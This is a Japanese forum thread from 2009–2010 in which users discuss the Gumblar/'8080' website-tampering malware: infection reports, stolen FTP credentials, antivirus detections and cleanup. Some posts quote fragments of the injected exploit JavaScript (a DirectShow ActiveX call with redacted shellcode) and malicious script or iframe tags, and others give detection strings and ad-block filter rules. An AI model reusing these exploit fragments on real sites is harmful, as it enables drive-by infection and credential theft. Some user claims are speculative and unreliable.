【Gumblar/GENO】Web改竄ウイルス総合スレ【8080】at SEC
【Gumblar/GENO】Web改竄ウイルス総合スレ【8080】 - 暇つぶし2ch79:名無しさん@お腹いっぱい。
09/12/28 02:43:33
pdfupd.exe って名前から判断して、またAdobeReaderの脆弱性か?。

たしかコレって、ゼロデイの可能性ありってやつじゃなかったか?
URLリンク(www.adobe.com)

これじゃねーだろうなぁ。
これだったら、Js切るか、AdobeReaderアンインスコしない限り、対策ないぞ。



80:名無しさん@お腹いっぱい。
09/12/28 02:48:41
>>79
あんた、ちょっと遅れてる・・・・

新手の正規サイト改ざんでAdobe Readerのゼロデイ攻撃~今すぐ対策を
URLリンク(www.so-net.ne.jp)

Adobe Reader 及び Acrobat の未修正の脆弱性に関する注意喚起(JPCERT/CC)
URLリンク(www.jpcert.or.jp)

81:名無しさん@お腹いっぱい。
09/12/28 02:48:53
>>79
マイクロソフトのActiveX
MS09-032あたりじゃないかな

82:名無しさん@お腹いっぱい。
09/12/28 02:53:23
>>80
ありゃ。やっぱゼロデイか。PDF切っとくか。

83:名無しさん@お腹いっぱい。
09/12/28 02:57:49
>>82
pdfupd.exeは>>81氏が言うActiveXの脆弱性突くものかもしれないけど、ゼロデイ攻撃始まってるのも事実ってことで

84:名無しさん@お腹いっぱい。
09/12/28 03:00:07
今回はマイクロソフトのActiveXの脆弱性を突かれてpdfupd.exeがダウンロード実行されたってこと
Adobe Readerがインストールされていれば違った攻撃もあるかも知れない

85:名無しさん@お腹いっぱい。
09/12/28 03:12:40
>>78みる限り、各ベンダー全滅、かろうじてカスペが引っかかったりしなかったりで
後はGENOみたいにPC立ち上がらなかったりするような分かり易い症状もないってこと?

86:名無しさん@お腹いっぱい。
09/12/28 03:16:04
GENO系の全てに黒画面にマウスカーソルの症状が出る訳じゃないんだけど

87:名無しさん@お腹いっぱい。
09/12/28 03:16:17
上にもあるように
ノートンやAviraなどはファイルスキャンではなくwebサイトにアクセスすると検出する仕組みになってる
AviraフリーはWebGuardが無いから注意が必要だが

88:名無しさん@お腹いっぱい。
09/12/28 03:19:08
>>78はpdfupd.exeの検出結果のみであって、どのファイル・コード・タイミング・振る舞いで検出するかもベンダーで違うだろうしなんとも言えないな
ヒューリスティックで捕まえる場合もあるだろうし

ただ
>分かり易い症状もないってこと?
これはYesって言っといた方が対策する人も増えるか?

89:87
09/12/28 03:21:34
ごめん
AviraはWebGuardじゃなくても検出するかも知れない
検証はしていないので分からない

90:名無しさん@お腹いっぱい。
09/12/28 03:24:39
>>76
WebGuardなくてもAviraで検出することを確認

91:名無しさん@お腹いっぱい。
09/12/28 03:32:43
>>24
自己レス
avast!がスクリプトに対応

/*GNU GPL*/
26日 結果: 1/41
Avast 4.8.1351.0 2009.12.27 JS:Illredir-B
URLリンク(www.virustotal.com)

92:名無しさん@お腹いっぱい。
09/12/28 03:32:56
>>76
win.jpg のvirustotalスキャン結果
URLリンク(www.virustotal.com)

93:名無しさん@お腹いっぱい。
09/12/28 03:45:55
>>91
avastは誤検出しまくってるようだが
そのせいではないの?

94:名無しさん@お腹いっぱい。
09/12/28 04:08:43
JAVAを利用した攻撃の際は
win.jpgではなくJavaGame.jarがダウンロードされる
URLリンク(www.virustotal.com)

95:94
09/12/28 04:10:59
ちなみにノートンではダウンロードしようとするときに検出するが
virustotalで検出されない

96:名無しさん@お腹いっぱい。
09/12/28 05:00:58
JAVAが無いときは
Adobe Readerも利用されるね

97:名無しさん@お腹いっぱい。
09/12/28 06:39:35
URLリンク(beatarai)●blog90.fc2●com/

avastのスレでも書かれていたけど、
このブログは大丈夫?

98:名無しさん@お腹いっぱい。
09/12/28 07:20:25
win.jpg はDirectShowのMS Video ActiveX Control(CVE-2008-0015)の脆弱性攻撃。
JavaGame.jar はJRE(CVE-2008-5353)の脆弱性攻撃。
pdfupd.exe はAdobe Readerの脆弱性攻撃用の ChangeLog.pdf が落として来て実行するトロイの木馬本体。
他のルートでも最終的には同じものが落ちて来て、このトロイの木馬が Bredolab とか HDrop
とかで検出されるはず(でも今は全然検出してくれなぁ)のダウンローダです。

ダウンローダが、その後何をダウンロードしてくるかは、その時の攻撃者の気分次第。
攻撃側が用意したものを何でもインストールできちゃうわけね。

実行してみれば、その時点で落ちて来るものは分かるんだろうけど。


99:名無しさん@お腹いっぱい。
09/12/28 08:37:05
何か役に立つかもしれないので報告

fxwill●comにウイルスがあると聞き試しに見てみた(←阿呆)
/*GNU GPL*/~というコードが埋め込まれてたっぽい

サイトを開くと
このファイルの実行を許可しますか?というウインドウが出てきて(VISTA)
「キャンセル」を押しても再度同じウインドウが表示
何度押しても同じでそのうち画面が固まる

再起動して、通常起動でウインドウを開始すると
マイクロソフトセキュリティーエッセンシャルが反応
詳しい表示は憶えてないけど、表示されたファイルの削除を選択(履歴見ても何も残っておらず詳しいことが不明)

PCはそのまま使えていたので安心していたら、
出先で自分のサイトを携帯でみたらエラー500が表示されるのに気づく

家に帰り、サーバーの履歴を見ると感染源のサイトを見た直後から複数のIPでログインされてた。
そしてパソコンの電源を切って外出した時間あたりでログインも止まっていた。

もう1台のパソコンからFTPのパスワードなど変更
サーバー上のファイルも消去
ファイルを見るとindex.html index.php ~.jsファイルがほぼすべて最下部に/*GNU GPL*/~が埋め込まれていた。

問題のPCにカスペの体験版を入れて(オンラインスキャンが停止中なので)みたら
スタートアップにsiszyd32.exeが検出されたので削除。

今ここ

もうこれ再インストールするしかないんでしょうか。

100:名無しさん@お腹いっぱい。
09/12/28 08:42:16
追記

説明がわかりにくいね
自分のサイトはレンタルサーバー上にあり
FTPで更新しています。

101:名無しさん@お腹いっぱい。
09/12/28 08:47:32
>>99
感染した状態でサイト更新した?
それともFTPとか使ってなく自サイトにアクセスした覚えがないのにパス抜かれて改ざんされたの?

102:名無しさん@お腹いっぱい。
09/12/28 08:58:22
>>101

レンタルサーバーは2つ借りていて
片方はWORDPRESSの管理画面からログインはした。

でももう一方は数カ月まったく使っていないサーバーで
念のためにもう一台のパソコンから調べたらしっかりファイルが書き換えられてた。
どちらもFTPソフトにパスワードは登録していた。

103:名無しさん@お腹いっぱい。
09/12/28 09:28:45
サイト閉じてとっとと再インスコしろよ…

104:名無しさん@お腹いっぱい。
09/12/28 09:41:40
>>93
webシールドで止まるようになった。


105:名無しさん@お腹いっぱい。
09/12/28 11:41:07
URLリンク(twitter.com)

いや、アンタが最初にすべきことは、自分のサイトを閉じることだろ。。

106:名無しさん@お腹いっぱい。
09/12/28 12:38:09
どもども、99です
サイトは閉めてサーバー上のファイルは全部消してるよ

今、PCの再インストール中
いらんソフトとか捨てるいいきっかけになったよ、スッキリ

107:名無しさん@お腹いっぱい。
09/12/28 14:42:08
>>106
FTPクライアントは何使ってるの?
パスワード保護に強いのはないかな?
FileZilla使ってるけど全く暗号化してないしこれ最低だよな

108:名無しさん@お腹いっぱい。
09/12/28 15:10:25
これってオンラインゲームのIDもとられるの?


109:名無しさん@お腹いっぱい。
09/12/28 15:38:16
そんなチンケな物はとらんよ、たぶん

110:名無しさん@お腹いっぱい。
09/12/28 16:35:05
>>>107

FFFTP使ってる

サーバーのログイン履歴詳しく見てみたけど
やっぱりパソコンの電源切った時からログインがなくなってる
感染から外出まで1時間、外出から帰宅まで4時間
感染

感染に気付かずPC電源切り外出

帰宅

電源切るまでは、ほぼ10秒単位でランダムなIPからログインあり。
その後帰宅するまでまったくログインなし。

あと、/*GNU GPL*/~というコードの最後に規則的な英数字が0~300個ずつ改行されてくっ付いてた。

一応参考までに報告

111:名無しさん@お腹いっぱい。
09/12/28 22:49:21
「思い立ったら書く日記」と「べつになんでもないこと」はググって必ずチェックすることをオススメする。

112:名無しさん@お腹いっぱい。
09/12/28 22:52:00
遠慮しとく

113:名無しさん@お腹いっぱい。
09/12/28 22:58:43
>>110
参考になった。情報サンクス。

114:名無しさん@お腹いっぱい。
09/12/29 08:46:20
感染確認に
適当なフリーページ登録してFTPでアップロードしてみりゃいいのかな?


115:名無しさん@お腹いっぱい。
09/12/29 14:51:00
某ブログで見たが8080系はWinampの脆弱性も突くのか?

116:名無しさん@お腹いっぱい。
09/12/29 15:40:07
Winampの脆弱性ってのもよくわからないんだよな。
俺は必要十分余計な機能は欲しくないという理由でいまだに2.81を使っているんだが、現行とは
系統が違うこのあたりの古いバージョンにも同様の危険性があるのかねえ?

117:名無しさん@お腹いっぱい。
09/12/29 16:02:10
Winampは何度か脆弱性が話題になってるよな
出来れば最新を使うか使わない方が良い

118:116
09/12/29 18:08:06
WAN接続はCDDBからの情報取得だけでファイルを直接再生することは皆無なんだけどね。
最新版への更新も検討してみるかな。

119:名無しさん@お腹いっぱい。
09/12/29 23:28:07
>>115

この辺のことか?
| var ovCEkVSTS = document.createElement('object');
| document.body.appendChild(ovCEkVSTS);
| ovCEkVSTS.id = 'IWinAmpActiveX';
| ovCEkVSTS.width = '5';
| ovCEkVSTS.height = '5';
| ovCEkVSTS.data = './pics/win.jpg';
| ovCEkVSTS.classid = 'clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
| var tIx8bqnvuS = *** ShellCode ***

IWinAmpActiveXって名前付けてるけど、呼び出してるclassidはDirectShowだよ。
そんで、MSVideoの脆弱性(CVE-2008-0015)搭載のwin.jpgを食わせてShellCode実行!



120:名無しさん@お腹いっぱい。
09/12/29 23:40:42
違うだろ

121:名無しさん@お腹いっぱい。
09/12/30 12:04:12
>>119
URLリンク(img51.yfrog.com)

122:名無しさん@お腹いっぱい。
09/12/30 13:24:05
このウィルスって各ベンダーのスキャンで発見できるの?
FTPにファイル上げるときに、同じく登録してあった別パスぶっこ抜かれて全部改竄されたって話だけど
逆にFTPにパス保存してあっても、実際に起動して更新作業しない限り
サイト改竄は免れんの?
それとも感染直後に(感染後FTP未使用でも)勝手にパス抜きされて接続、改竄なの?

123:名無しさん@お腹いっぱい。
09/12/30 15:22:39
8080用チェッカー作った

124:名無しさん@お腹いっぱい。
09/12/30 16:30:26
Gumblarは新コードのテスト中?
<script src=hhttp://「中略」.php?op=java ></script><body>


125:名無しさん@お腹いっぱい。
09/12/30 17:47:35
俺もやれたんだけど
FFFTPに登録してあるサイトが全部がやられた
接続してないサイトもやられてたから
どれか1つ接続するとリストにある奴が全部やられたってことだな

つまりこれってFFFTPがハッキングされたことになるのか?
他の感染者がどのFTPソフト使ってるのかわかないからなんともいえないが

というか感染してからまだウィルスだと気づいてないとき自分のサイト見たら
AVGが反応したんだが、つまりウェブ上からは感染は防げてたってことだから
最初の感染はローカルってことになる

pdfとか見てたからやっぱり感染元はこれっぽいな


126:名無しさん@お腹いっぱい。
09/12/30 17:58:49
感染したときに設定読み取るのかもよ

127:名無しさん@お腹いっぱい。
09/12/30 19:27:20
>>121
うっ!ほんとだ。
2年ぐらい前のAOL Winampの脆弱性ぽいっすね。
わざわざインストールさせようとしているcabを落としてみたら
2005年4月版でやんの。何でAOLはこんな古いの置いてんだ。

128:名無しさん@お腹いっぱい。
09/12/30 20:02:06
>>99見てると、UAC有効にしてても効果がないってことか

129: ◆774......E
09/12/30 22:17:20
新型8080系用のチェッカー出来たので公開してみるテスト
URLリンク(www12.atpages.jp)

130:名無しさん@お腹いっぱい。
09/12/30 23:59:28
俺はどこも信用できないね

131:名無しさん@お腹いっぱい。
09/12/31 00:57:04
>>129
せめて文字コードぐらい指定してくれ
IEで開いたら文字化けしてびびったw
ウィルスかた思ったぜw

132:名無しさん@お腹いっぱい。
09/12/31 01:49:39
もうネットにつながないから
この脅威が去ったら電話くれ!

133:名無しさん@お腹いっぱい。
09/12/31 10:25:50
結局、感染したらFTPで鯖にファイル上げるしか確かめようは無いのか?
感染した奴は皆このルートで判明?

134: ◆774......E
09/12/31 10:40:00
>>131
ごめんなさい><文字コード指定しました

135:名無しさん@お腹いっぱい。
09/12/31 12:05:30
ここに張ってるURLは危険そうですな

136:名無しさん@お腹いっぱい。
09/12/31 12:17:02
/*GNU GPL*/踏んだ可能性があるんだけど
spoolsv.exeってのが新たに出来てる気がする
これ関係ある?

137:名無しさん@お腹いっぱい。
09/12/31 12:33:10
>>136
spoolsv.exeはプリントスプーラだよ。
プリントジョブの仕掛かりが溜まってない?

138:名無しさん@お腹いっぱい。
09/12/31 13:24:17
>>137
いや、それが少なくともここ1年はプリンタにつないでないPC
なのにマカのファイアーウォールの設定でもいつの間にか送受信完全に許可扱いになってる
そもそもタスクマネジャでメモリ使用上位にそんなのは今までいなかった気がする
で、spoolsv.exeでググったら、トロイの偽装の可能性と出てきたんで

でもフルスキャンしても何もでてこないし
CPU使用率は安定してるし
少なくとも表面上はPCがどこかにアクセスしっぱなし、と言う風には見えないし
もうどうすりゃいいんだか

139:名無しさん@お腹いっぱい。
09/12/31 13:38:46
>>131
ついでに、Gumblarの簡易チェックも組み込めないかな?

</head><script src=URLリンク(*.php) ></script><body
これがあったら黒判定って事で。

140:名無しさん@お腹いっぱい。
09/12/31 13:41:12
>>138
サービスを殺しても生きてたら
変なのが寄生してると思われ。

141:名無しさん@お腹いっぱい。
09/12/31 14:13:43
>>138
Process ExplorerかSlightTaskManager(これはXPまでらしい)でspoolsv.exeのパス(フォルダ)を
確認して、spoolsv.exeのファイルのプロパティで作成日時、更新日時、等がおかしくないか確認。
その後、spoolsv.exeをvirustotalでチェックする、くらいしか思いつかない。

142:138
09/12/31 16:06:59
>>140-141
Process Explorer等入れてないんで(この状況下でネットつなげないし)
マカのアクセス許可設定にあったパス(system32以下)でプロパティチェック
作成日時、更新日時は随分前のまま変わらず(少なくとも踏んだ可能性のある日じゃない)で56.5kb
メモリの使用量は38.956
ネットきってるんでvirustotalに確認にいけてないが、なんとなく白っぽい
気がするんだがどうか

サイト管理者以外で、/*GNU GPL*/感染確認するには、本当どうしたらいいんだろうか



143:名無しさん@お腹いっぱい。
09/12/31 16:19:01
spoolsv.exeはOSにデフォルトで入ってるだろ

144:名無しさん@お腹いっぱい。
09/12/31 17:24:32
>>143
もちろんそうなんだが
どんだけスキャンかけても何にも引っかからないんで、
とりあえず普段と(多分)違う挙動のものを虱潰しにしてるんだよ
spoolsv.exeがトロイ偽装のケースもあるって話しだし
/*GNU GPL*/感染で、実際にどんな症状が出るかってのが全く聞こえてこないんだが
サイト改竄以外に何があるんだ?

つうかPC調子悪いときに携帯規制とかキッツイ



145: ◆774......E
09/12/31 18:27:33
>>139
今回のバージョンアップの際に簡易的にチェックするようにしました。
もしかしたら誤検出があるかもしれません

>>144
別のウイルスをダウンロードしてきます。

146:名無しさん@お腹いっぱい。
09/12/31 18:28:55
どこの馬の骨だよ

147:名無しさん@お腹いっぱい。
09/12/31 20:03:18
>別のウイルスをダウンロードしてきます。

今回感染後も普通にPCつかえてて、自サイト改竄が発覚して漸く感染に気づくとか
そんなのばっかりな気がするけど
/*GNU GPL*/感染のケースで他のウィルス呼び込んだ事例あがってんの?

148:名無しさん@お腹いっぱい。
09/12/31 21:21:18
紅白FLASH合戦スレで/*GNU GPL*/報告出たけどスルーされてたな
何人か開いちゃったんじゃないのあれ

149:名無しさん@お腹いっぱい。
09/12/31 22:37:48
なんかあっちこっちのスレで/*GNU GPL*/のURL貼られてる割に
いまいち騒ぎになってないよな
JRやホンダまで感染したのに、そこを踏んで自分が感染したっていう犠牲者の声が少ない
GENOのときはPC再起動不可っていう分かりやすい(といか致命的)エラーが出たから
皆感染が分かったけど
今回は自覚症状無いまま、感染後そのままPCで飼ってるやつ多い気がするんだが

150:名無しさん@お腹いっぱい。
09/12/31 22:45:08
アドビ関係全部アンインスコして専ブラで2chだけを見るネット生活を八ヶ月続けてるが
それでも不安が拭えない

151:名無しさん@お腹いっぱい。
09/12/31 22:51:56
オミで/*GNU GPL*/を含むscriptタグを殺しちゃえばいいんじゃね

152:名無しさん@お腹いっぱい。
09/12/31 23:10:21
>>149
Gumblarの時にはコマンドから起動出来る出来ないや
ファイルのサイズでで見分けられたりしたけど
今回はどうやって見分けるかのかまだよく分からないしなあ・・・
各種アンチウイルスソフトは感染しているときちんと動作するのかとかも。

違法ファイルのダウンロードの法律よりも、故意にウイルスばらまいたやつに
罰則強化とかしてほしい。

153:名無しさん@お腹いっぱい。
09/12/31 23:26:33
今回のは感染後、各ベンダーのサイトが開けなくなったとか
MSアップデートが出来なくなった、とかそういう話も聞かないよな
今のところは「FTPでパス抜きされたあと」から、10秒単位で不正アクセスっていう
コレくらいしか目立った特徴は出てない気が


154:名無しさん@お腹いっぱい。
10/01/01 03:48:56
年明け早々、会社のWEBページが改ざんされたw

形態に電話があり、今から出勤、最悪。

Gumblar再開とかかいてあるし、何されてるのか。

正月休みもパーだな。

155:名無しさん@お腹いっぱい。
10/01/01 03:51:48
脆弱性対策をしててもプラウザのJavaScriptがオンなら、8080サイトからマルウェアが自動的に
ダウンロードされて、発動はしなくてもPC内に残るのかな?もしそうなら、それはそれで気持ち悪いな

156:名無しさん@お腹いっぱい。
10/01/01 04:55:50
>>154
ドンマイw

157:名無しさん@お腹いっぱい。
10/01/01 04:58:13
>>155
いや

158:名無しさん@お腹いっぱい。
10/01/01 05:31:17
Adblock Plusの存在を忘れてた・・orz

・8080
*:8080*$script,link,object

・Gumblar
*.php$script,link,object


159:名無しさん@お腹いっぱい。
10/01/01 17:36:13
スレリンク(sec板:392-405番) から。
 → URLリンク(www)●stardustpictures●co●jp/katagirihairi4/

160:名無しさん@お腹いっぱい。
10/01/01 17:56:02
カスペルスキーのオンラインウイルススキャンは現在は停止中なのかな?

161:age
10/01/01 18:02:21
某所から転載
--ここから--
www●ideele●nl/a-home.htmに埋め込まれたコードの難読化を解除すると
<iframe width=1 height=1 border=0 frameborder=0 src='hURLリンク(sodanthu)<)●com/cp/scripts/formmail-doc/example_src●html

因みに>>129のチェッカーはスルーする。

162:名無しさん@お腹いっぱい。
10/01/01 18:37:19
チェッカーだめじゃんw

163:名無しさん@お腹いっぱい。
10/01/01 18:43:01
>>161
カスぺは反応するが

164:名無しさん@お腹いっぱい。
10/01/01 19:12:55
>>159
30日くらいにモームス板(?)に
"超一流芸能事務所スターダストのホームページにトロイの木馬"
ってスレが立ってたようだけど、それかな?
スレ自体は直ぐに落ちた様だけど。

avast!だと、JS:Illredir-B [Trj] で
カスペルスキーだと Trojan-Clicker.JS.Iframe.db なのかな?

先日、avast!が JS:Illredir-B [Trj] をブロックしてくれたのかも知れないけど
個人ブログとかにも広がってるかも。

165:名無しさん@お腹いっぱい。
10/01/01 19:12:58
>>110
乙です。

感染すると自動的に他のPCから他のPCからかきかえにくるのかな。
ボットか何かかな。


166:名無しさん@お腹いっぱい。
10/01/01 19:20:43
カスペのオンラインでもいまだと検出されるの?

>>160ニフの方も止まってるの?

167:名無しさん@お腹いっぱい。
10/01/01 19:24:09
>>166
ニフティの方は分からないけど、公式(日本語)サイトの方は
年末年始って事なのか停止中っぽいけど。

168:161
10/01/01 19:48:25
"<script>function" "return String.fromCharCode(c);" "getElementById("
高確率でヒットするので、これで捜索中・・・

169:名無しさん@お腹いっぱい。
10/01/01 19:56:23
>>167
ニフの方はいけたはずだけど、中身同じじゃねえの?

170:名無しさん@お腹いっぱい。
10/01/01 21:16:49
よくよく読んでみたら、上で報告の上がってる>>99ってFFTTP起動させるまえ、
感染サイト踏んだ直後から自サイトにアクセスされて書き換えされてたって事?
となると、踏んでアウトなら、
その瞬間にFTP起動有無にかかわり無く速攻保存してある管理パス抜かれて
改竄されるって事か



171:名無しさん@お腹いっぱい。
10/01/01 21:24:13
FFFTPだった。まあいいや

172:名無しさん@お腹いっぱい。
10/01/01 22:10:22
>>161
検索してみた

悪意のあるリンク先URLのリスト(マルウェアドメイン一覧)
URLリンク(www.itis.tw)
↑ここにリストがありますね
ホストするIP:127.0.0.1

URLリンク(www.itis.tw)←誰が作ったの?

173: ◆774......E
10/01/01 23:06:02
>>161
反応するようにしました。

174:名無しさん@お腹いっぱい。
10/01/02 05:59:43
>>172
台湾人だろ

175:名無しさん@お腹いっぱい。
10/01/02 07:38:11
GNU GPLのやつなんてファイアウォールで
アウトバウンド制御してるだけでも防げそうだけどな
感染した人は入れてないだろ

176:名無しさん@お腹いっぱい。
10/01/02 08:22:58
>>174
知らねえ奴は黙ってろ

177:名無しさん@お腹いっぱい。
10/01/02 09:40:25
>>175
そう言えば
なぜかファイアウォールのアウトバウンド制御はいらないとか主張するやつが最近増えてたな
それだけでも防げることなのに

178:名無しさん@お腹いっぱい。
10/01/02 10:19:30
シナの留学生が工作してるんだろw

179:名無しさん@お腹いっぱい。
10/01/02 10:27:39
中国のIP防ぐだけでもかなり安全になるよね

180:名無しさん@お腹いっぱい。
10/01/02 10:46:20
"fff=op.split(" "fff.op.replace(" の検索結果 約 14,200件

>>172
サイトのタイトル
惡意連結網址列表 (Malware Domain List) | 資安之眼
実際に表示されるサイトのURL
URLリンク(www.itis.tw)
IPアドレス
60.248.88.10
逆引きホスト名
ns1.misway.com


181:名無しさん@お腹いっぱい。
10/01/02 12:57:42
>>176
知らねえ奴は黙ってろ

182:名無しさん@お腹いっぱい。
10/01/02 20:59:02
あーわかった
FFFTPのインポート/エクスポートってレジストリファイルを読み込み/出力してる
だからGumblarはレジストリからFTPでアクセスする(改ざんする)サイトをみてるわ

FTPソフトってどれもレジストリいじってるのか?

てっきり普通のファイルに保存してるのかと思ってたぜ


183:名無しさん@お腹いっぱい。
10/01/02 22:07:17
FFFTPはini保存もできるし、パス抜きは普通にポート見てるだけだろ。
FTPは平文で、だからSFTP使えって話になってるんだよ。

184:名無しさん@お腹いっぱい。
10/01/02 22:24:42
>>183
知らねえ奴は黙ってろ

185:名無しさん@お腹いっぱい。
10/01/02 22:56:18
>>183
>>125の状況みるとポートだけ見てるだけではないと思うが
レジストリにFTPのIDとパスを書き込んでるんから
そこで見破られたんじゃないかという話
SFTP使ってもレジストリいじるソフトなら意味んじゃないか

まあ感染してない奴が憶測で言ってもしょうがない



186:名無しさん@お腹いっぱい。
10/01/02 23:35:36
Unmask Parasites. Blog.がものすごく詳しいな。

187:名無しさん@お腹いっぱい。
10/01/03 00:33:44
うわまたきてるww
放置してたんでパス変えるの忘れてたサイトみたらやらてたw
時間は2010/01/02 23:27

やっぱ感染するとFTPのIDとパス盗まれてるわ
FTP接続しなくても改ざんされてるww

188:名無しさん@お腹いっぱい。
10/01/03 00:52:23
「F-Secure Exploit Shield 0.70 build 19」
URLリンク(www.f-secure.com)
解説サイト→URLリンク(all-freesoft.net)

XP SP3でavast!と共存させて人柱してるが、問題無く稼動中。

189:名無しさん@お腹いっぱい。
10/01/03 01:04:44
F-Secureはこれ検出すんの?

190:名無しさん@お腹いっぱい。
10/01/03 01:11:48
じゃあ、ウィルスサイト踏んでも、FTPインスコ済みID記憶済み、FTP未接続で
サイト感染が無ければ白ってことか?

191:名無しさん@お腹いっぱい。
10/01/03 01:21:48
>>189
試したところ駄目っぽい感じ

192:名無しさん@お腹いっぱい。
10/01/03 01:28:54
>>186のブログの翻訳を読んでみたが
今発病してるサイトの運営者はだいぶ前から感染していて
すでにFTPのIDとパスは盗まれてるようだ
だからウィルスまいた奴の好きな時間にサイトを改ざんできる
防ぐにはFTPのパスを変えるしかなさそうだ

だいたいこんなかんじじゃね
GNU GPL踏むとFTPのIDとパスがあれば盗まれる
サイト運営してない人はたぶん無害かも

改ざんの告知にウィルススキャンだけでなく
サイト運営者はFTPパスの変更も加えたほうがいいかもな

JRの時は2週間ぐらい放置してたんだろ
FTPパス盗まれた運営者まだたくさんいると思うぜ


193:名無しさん@お腹いっぱい。
10/01/03 01:30:31
何を今更

194:名無しさん@お腹いっぱい。
10/01/03 01:33:31
>>186でもの凄く詳しいな、って書いてるけど内容はその程度なのか

195:名無しさん@お腹いっぱい。
10/01/03 01:39:35
トークン認証でよくね?

196:188
10/01/03 01:42:57
よ~く見たら、ですね・・・
防いでくれてるのは
CVE-2006-3730
CVE-2007-0038
CVE-2006-4868
CVE-2006-4301
CVE-2008-3008
CVE-2006-0005
CVE-2008-4844
CVE-2009-0901
CVE-2009-0927

「CVE-2009-4324」入って無いじゃん・・・ (´・ω・`)

gred AVアクセラレータの方が良いかもしれん

197:名無しさん@お腹いっぱい。
10/01/03 01:46:57
gredなんか論外だが
aviraやavastやらでも対応は出来る
ファイアウォール程度入れとけ

198:名無しさん@お腹いっぱい。
10/01/03 01:56:00
FWで防げるのに広まってるの?

199:名無しさん@お腹いっぱい。
10/01/03 02:01:58
ファイアウォール入れとけばおかしな通信があるからすぐ分かるね
実際にこの通信がパスワードを流してるかどうかは不明だけど
間違いなくおかしいと気づく

200:名無しさん@お腹いっぱい。
10/01/03 02:11:10
多くの人が無防備ってことだろうな
MSEなんか使ってファイアウォールはWin標準なんて人も多かったんじゃないのかな

201:名無しさん@お腹いっぱい。
10/01/03 02:26:14
実際のところサイト運営者以外無害なのか

おまえらサイト運営してるの?

>>187以外にいる?

202:名無しさん@お腹いっぱい。
10/01/03 02:34:14
報告にもあるとおり
Windows起動時のスタートアップに実行ファイルを登録する
その実行ファイルが通信する
その他システムの改変は今のところ俺は確認してない
しかしどんな攻撃でも可能だから注意は必要

203:188/196
10/01/03 03:02:59
>>197
PC Tools(笑)を入れてるよ
v6.0.0.86

204:名無しさん@お腹いっぱい。
10/01/03 04:34:02
Firewallのログを見ておかしな通信を見つけたところでもう遅い
その通信を止めてくれてこそ役立ったってことでしょ
だいたい警告もないのにFWのログなんて見ます?
実際には大手のサイトのWEB制作会社がFWも入れてないとは
考えられないので、FWは突破されてしまっているんでしょうね

205:名無しさん@お腹いっぱい。
10/01/03 04:36:13
最初の通信で問い合わせがあるだろ
まあ使ってるソフトにもよるがそう言うソフトを使えってこと

206:名無しさん@お腹いっぱい。
10/01/03 04:39:40
>>204
知らねえ奴は黙ってろ
君にはこれが適切

207:名無しさん@お腹いっぱい。
10/01/03 04:40:09
>>205
そういうのをセキュリティソフトに対する過信って言うんだよwww


208:名無しさん@お腹いっぱい。
10/01/03 04:41:26
試せば分かること
知らねえ奴は黙ってろ

209:名無しさん@お腹いっぱい。
10/01/03 04:43:19
>>207
書き込み内容からして無知なのは明らかだが
なんでそんな自信ありそうな語り口なんだ

210:名無しさん@お腹いっぱい。
10/01/03 04:45:16
>>208
じゃあ、何を試してどういう結果になったか全部書き出せよ
FWを入れていれば大丈夫みたいないい加減なこと書き込まないでさぁあ


211:名無しさん@お腹いっぱい。
10/01/03 04:47:40
>>210
このスレに全部書いてあるんじゃないか
このスレは色んな人がいるから仕方ないが
まともなこと言っても無知なやつが偉そうな口調で否定するからこまる

212:名無しさん@お腹いっぱい。
10/01/03 04:51:38
>>211
だから、具体的にどこのFWなら、ちゃんと警告を出して
どこのものなら、簡単に突破しているって出してみろよ

213:名無しさん@お腹いっぱい。
10/01/03 04:55:18
初心者スレいけよ

214:名無しさん@お腹いっぱい。
10/01/03 05:00:05
なんだここは、全くの役立たずスレだな
実際にはFWが役に立っているかどうかなんて分からないくせに
いい加減なこと書き込むんじゃね~YO・・・ボケw

215:名無しさん@お腹いっぱい。
10/01/03 05:06:43
お前みたいなやつは何言っても駄目だろ
全部書いてあるって言ってるのに
だから自分で試せよ

216:名無しさん@お腹いっぱい。
10/01/03 05:09:10
>>214
質問するならちゃんとした文章で質問してくれ
偉そうな態度で聞かれても誰も答える気は起きない

217:名無しさん@お腹いっぱい。
10/01/03 05:56:43
>>204
君はサイト管理者を過信してるんだよ
サイト管理者なんていい加減なんだろうな
そうでもなければこんな
>>159
こんなに放置されないだろ


218:名無しさん@お腹いっぱい。
10/01/03 06:06:09
>サイト管理者なんていい加減なんだろうな
だよな
はいりのとこまだ埋め込まれてるしw

あと削除してもちゃんと告知してるとこなんてわずかだろ
他の運営者にも広めてちゃんと対策とらせないとまだまだ続くぞこれ

219:名無しさん@お腹いっぱい。
10/01/03 06:38:40
そうだな、アホなサイト管理者はたいてい

Avira AntiVir Personal+Comodo Firewall

で完璧!
これ以上のセキュリティはありませんとか信じ込んでるからなwww


220:名無しさん@お腹いっぱい。
10/01/03 06:49:09
アホなサイト管理者を叩くのはいいが何とかしてもらわないと困るのは俺らだぜw


221:186
10/01/03 10:31:55
全容が全く掴めていない感じがする。
IBM Tokyo SOC Reportがツールを名指しするなど速い感じがしているけど。

222:名無しさん@お腹いっぱい。
10/01/03 16:38:26
シス管ってなにもできないの?

223:名無しさん@お腹いっぱい。
10/01/03 17:54:11
それなりの規模になると会社の各PCにパーソナルファイヤウォールを入れないことが多い。
シス管のPCも例外ではない。
会社のシステムでトラブルの原因になるから。

そもそも、ファイヤーウォールが反応したときは、すでにウイルスを埋め込まれていたとき。

ところでウイルスに感染したPC自体ででウイルスがかってにサイト書き換えたりはしないのかな

224:名無しさん@お腹いっぱい。
10/01/03 18:38:48
ローカルに保存されてるHTMLファイルを書き換えるってのは、よくある手法だけど

225:名無しさん@お腹いっぱい。
10/01/03 18:57:52
今回のGumblarの騒ぎをまとめると

最初の感染ルートはadobeの0-dayでこのときにFTPのIDとパスが盗まれる
このときは感染したかはわからずウィルススキャンでも検出できない

発病の第一弾がJR東日本やHONDAのときで12/20ごろ
第二段が12/25ごろ、中小サイトに感染がみられこのスレが立ったころ
第三弾が1/2 >>187

この発病というのがHPの改ざんでGNU GPLが埋め込まれるということ
すでにFTPのIDとパスが盗まれてるので運営者が接続してなくても第三者が改ざんできる

でこのGNU GPLが埋め込まれたHP見てもロシアなどの怪しいサイトに接続しようとするだけで
セキュリティソフトも反応ので実際のところ無害と思われる

こんなところだな





226:名無しさん@お腹いっぱい。
10/01/03 19:06:36
以上、古畑任三郎でした

227:名無しさん@お腹いっぱい。
10/01/03 19:40:42
要は自分が管理するFTPサーバを持たない奴は特別気にすることはないと理解していいのか?

228:名無しさん@お腹いっぱい。
10/01/03 19:53:24
今のところは
ただ言われているとおり
いつ攻撃が変わるか分からない
